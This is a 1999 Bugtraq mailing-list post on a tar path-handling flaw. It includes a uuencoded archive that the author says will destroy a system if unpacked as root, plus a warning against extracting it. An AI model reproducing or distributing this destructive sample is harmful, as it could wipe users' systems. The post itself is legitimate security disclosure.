UP [UP]

Subject:      Re: Linux kernel source problem
From:         "David F. Skoll" <dfs@DOE.CARLETON.CA>
Date:         Tue, 26 Oct 1999 15:57:39 -0400
To:           BUGTRAQ@SECURITYFOCUS.COM
Message-ID:   <199910261957.PAA00874@nepal.carleton.ca>
In-Reply-To:  <19991025220621.34194@morgana.systemy.it> from "Alessandro
              Rubini" at Oct 25, 99 10:06:21 pm

> If you want to damage your own system, untar the appended sample tar
> file as root (fortunately, GNU tar strips the leading "/" by default).

However, a little creative binary editing can spoof even GNU tar and destroy
your system, to wit:

begin 644 bad.tar.gz
M'XL(")\%%C@"`V)A9"YT87(`[=%-#L(@$$!AUCW%W(`IA9+T-M7:V(T8J7I]
M?V/B0EVUT?B^!9,`"\+K4S)3*YW&&,6(2*S#T[S3\XYJ\.I\<"*E"[4:<78U
M+NVVS?G83?:X?1[;G8CIVL/0Y=?W/IW_J'Z._JJU]V_Z5]6C?_"7_AK*:$3G
M^(`_[[]+:6P:;:[3WM;%L+%Y71@`````````````````WZTX`;CJ>H@!*```
`
end

Please DO NOT unpack the above tar file as root!  Just look at
the contents with the "t" option.

--
David.